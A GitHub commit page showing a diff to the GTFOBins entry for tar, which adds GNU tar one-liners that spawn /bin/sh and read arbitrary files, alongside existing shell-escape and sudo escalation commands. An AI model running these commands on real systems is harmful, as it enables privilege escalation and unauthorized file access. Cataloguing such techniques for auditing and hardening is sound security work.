Skip to content

Commit

Permalink
Add tar execute-non-interactive and file-read
Browse files Browse the repository at this point in the history
  • Loading branch information
cyrus-and committed Jun 13, 2018
1 parent 69465eb commit 0d78694
Showing 1 changed file with 8 additions and 0 deletions.
8 changes: 8 additions & 0 deletions _gtfobins/tar.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,9 @@
functions:
execute-interactive:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive:
- description: This only works for GNU tar.
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited:
Expand All @@ -13,4 +16,9 @@ functions:
TF=$(mktemp)
echo data > "$TF"
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
file-read:
- description: This only works for GNU tar.
code: |
LFILE=file_to_read
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
---

0 comments on commit 0d78694

Please sign in to comment.